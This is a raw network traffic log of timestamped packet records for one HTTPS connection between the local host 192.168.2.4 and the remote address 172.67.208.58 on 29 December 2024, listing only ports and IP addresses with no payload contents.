Dec 29, 2024 17:56:02.422909021 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.469775915 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.491755009 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.495815992 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.495860100 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.495871067 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.504179001 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.504224062 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.504230022 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.512589931 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.512650967 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.512661934 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.521047115 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.521097898 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.521105051 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.529436111 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.529506922 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.529512882 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.537842035 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.537878036 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.537883043 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.554522991 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.554559946 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.554567099 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.563035965 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.563085079 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.563090086 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.571376085 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.571417093 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.571424961 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.615899086 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.615948915 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.615973949 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.615983963 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.616024971 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.622421026 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.626636982 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.626683950 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.626698017 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.635025978 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.636045933 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.636054993 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.660659075 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.660713911 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.660721064 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.664918900 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.668807983 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.668814898 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.681655884 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.681730986 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.681737900 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.681782007 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.698421955 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.698429108 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.698477983 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.706882954 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.706940889 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.715265989 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.715272903 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.715342045 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.735990047 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.735996962 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.736053944 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.741884947 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.741940975 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.749504089 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.749560118 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.753534079 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.753598928 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.761035919 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.761123896 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.768256903 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.768321037 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.780972004 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.781176090 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.786408901 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.786469936 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.793800116 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.793853998 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.797674894 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.797719955 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.881153107 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.881206989 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.882471085 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.882524967 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.887459040 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.887509108 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.891983032 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.892036915 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.894356012 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.894409895 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.898905993 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.898948908 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.903467894 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.903532982 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.905771971 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.905821085 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.910046101 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.910103083 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.914262056 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.914315939 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.918344975 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.918401003 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.920469046 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.920520067 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.924293041 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.924340010 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.926345110 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.926398039 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.930058956 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.930108070 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.933692932 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.933744907 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.937452078 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.937503099 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.939414024 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.939464092 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.944040060 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.944169044 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.945997000 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.946084023 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.949584961 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.949637890 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.951564074 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.951616049 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.955303907 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.955382109 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.958900928 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.958955050 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.962663889 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.962723017 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:02.964629889 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:02.964688063 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.095696926 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.095705986 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.095776081 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.095782995 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.095815897 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.095841885 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.104748964 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.104763985 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.104861021 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.104868889 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.112735987 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.112750053 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.112801075 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.112809896 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.121649027 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.121661901 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.121705055 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.121711969 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.130737066 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.130750895 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.130799055 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.130806923 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.139154911 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.139167070 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.139214039 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.139220953 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.148246050 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.148261070 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.148309946 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.148317099 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.156162024 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.156174898 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.156223059 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.156229973 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.204159021 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.309406042 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.309415102 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.309454918 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.309492111 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.309501886 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.309534073 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.309554100 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.318511009 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.318527937 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.318649054 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.318658113 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.318710089 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.326376915 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.326394081 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.326508999 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.326517105 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.326581955 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.335455894 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.335472107 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.335558891 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.335568905 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.335611105 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.343911886 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.343925953 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.343981981 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.343990088 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.344028950 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.352965117 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.352978945 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.353038073 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.353044033 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.353086948 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.361991882 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.362010002 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.362061977 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.362066984 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.362103939 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.370017052 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.370031118 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.370085001 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.370090961 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.370132923 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.520128965 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.520145893 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.520211935 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.520222902 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.520263910 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.529093981 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.529107094 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.529161930 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.529166937 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.529201031 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.537044048 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.537059069 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.537111998 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.537117958 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.537168026 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.546159983 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.546174049 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.546241999 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.546248913 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.546289921 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.554522038 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.554537058 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.554606915 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.554614067 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.554651976 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.563607931 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.563621998 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.563674927 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.563680887 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.563719988 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.563734055 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.572587013 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.572601080 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.572664976 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.572669983 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.572803974 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.580557108 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.580571890 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.580626965 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.580631971 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.580667973 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.730297089 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.730318069 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.730389118 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.730401993 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.730441093 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.738709927 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.738725901 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.738790989 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.738797903 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.738841057 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.747272968 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.747287989 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.747340918 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.747350931 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.747392893 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.754714966 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.754729986 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.754781961 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.754787922 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.754828930 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.762698889 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.762713909 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.762805939 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.762813091 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.762901068 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.763794899 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.771210909 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.771226883 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.771285057 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.771291971 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.779778957 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.779798985 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.779841900 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.779848099 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.779875994 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.829273939 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.934029102 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.934050083 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.934094906 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.934108019 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.934149027 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.934166908 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.941737890 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.941751957 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.941829920 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.941837072 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.941875935 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.949004889 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.949033976 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.949069023 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.949074984 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.949105024 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.949124098 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.957262993 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.957278013 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.957330942 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.957338095 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.957389116 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.965684891 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.965698957 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.965755939 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.965761900 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.965801001 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.973417997 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.973433018 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.973484039 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.973489046 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.973522902 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.981786966 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.981801033 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.981848001 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.981853962 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.981890917 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.989098072 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.989111900 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.989173889 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:03.989180088 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:03.989218950 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.144758940 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.144783020 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.144853115 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.144875050 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.144915104 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.152259111 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.152273893 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.152324915 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.152332067 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.152376890 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.159493923 CET	443	49758	172.67.208.58	192.168.2.4
